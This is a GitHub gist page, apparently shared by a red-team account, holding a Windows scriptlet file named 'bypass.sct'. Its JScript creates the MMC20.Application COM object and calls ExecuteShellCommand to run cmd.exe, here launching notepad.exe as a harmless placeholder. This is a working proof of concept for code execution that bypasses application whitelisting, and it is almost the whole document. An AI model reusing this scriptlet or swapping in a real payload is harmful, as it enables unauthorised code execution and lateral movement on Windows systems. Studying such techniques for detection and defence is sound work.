Skip to content

Instantly share code, notes, and snippets.

@RedTeams
Forked from matthiaskaiser/bypass.sct
Created July 22, 2019 18:29
Show Gist options
  • Select an option

  • Save RedTeams/58569651a04963a5c1d4fb41dafb610b to your computer and use it in GitHub Desktop.

Select an option

Save RedTeams/58569651a04963a5c1d4fb41dafb610b to your computer and use it in GitHub Desktop.
<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
description='Dummy'
progid='giffile'
version='1.00'
remotable='True'>
</registration>
<script language='JScript'>
<![CDATA[
new ActiveXObject('MMC20.Application','localhost').Document.ActiveView.ExecuteShellCommand('cmd.exe','','/c notepad.exe','7');
]]>
</script>
</component>
</package>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment